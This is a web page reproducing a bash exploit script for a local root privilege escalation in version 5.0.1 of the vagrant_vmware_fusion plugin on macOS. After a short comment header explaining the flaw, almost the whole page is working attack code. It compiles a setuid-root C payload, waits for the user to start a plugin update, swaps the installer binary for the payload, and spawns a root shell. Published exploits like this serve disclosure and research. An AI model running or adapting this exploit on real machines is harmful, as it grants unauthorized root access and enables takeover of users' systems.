扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 |
# I recently blogged about how the installation process of version 5.0.0 of this # plugin could be hihacked by a local attacker or malware in order to escalate # privileges to root.Hashicorp pushed some mitigations for this issue fairly # quickly but unfortunately 5.0.1 is still exploitable with a slightly different # approach. # They removed the chmod/chown shell commands from their osascript invocation and # instead simply executed their installer as root, but apparently didn't realise # that the installer is not root-owned so can be swapped out by a local attacker # during the process. # This issue is fixed in version 5.0.2. # https://m4.rkw.io/vagrant_vmware_privesc_5.0.1.sh.txt # c38ecc9fdb4f37323338e8fd12b851133a2121f3505cde664e6d32f1ef49ba23 # ----------------------------------------------------------------------------- #!/bin/bash echo "########################################" echo "vagrant_vmware_fusion 5.0.1 root privesc" echo "by m4rkw" echo "########################################" echo echo "compiling..." cat > vvf.c <<EOF #include <unistd.h> #include <stdio.h> #include <stdlib.h> int main(int ac, char *av[]) { setuid(0); seteuid(0); if (ac > 1) { system("mv -f $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64 /tmp/vvf_exp"); system("chown root:wheel /tmp/vvf_exp"); system("chmod 4755 /tmp/vvf_exp"); system("mv -f $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64.orig $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64"); system("$HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64 install\012"); return 0; } system("rm -f /tmp/vvf_exp"); execl("/bin/bash","bash",NULL); return 0; } EOF gcc -o /tmp/vvf_exp vvf.c rm -f vvf.c echo "waiting for user to initiate vagrant plugin update..." while : do r=<code>ps auxwww |grep '/usr/bin/osascript -e do shell script' |grep 'vagrant-vmware-installer_darwin_amd64' if [ "$r" != "" ] ; then break fi done pid=<code>ps auxww |grep './vagrant-vmware-installer_darwin_amd64 install' |grep -v grep |xargs -L1 |cut -d ' ' -f2 cd $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop echo "dropping payload in place of installer binary..." mv -f vagrant-vmware-installer_darwin_amd64 vagrant-vmware-installer_darwin_amd64.orig mv -f /tmp/vvf_exp vagrant-vmware-installer_darwin_amd64 echo "waiting for payload to trigger..." while : do r=<code>ls -la /tmp/vvf_exp 2>/dev/null |grep -- '-rwsr-xr-x' |grep root if [ "$r" != "" ] ; then echo "spawning shell..." /tmp/vvf_exp exit 0 fi done |
体验盒子
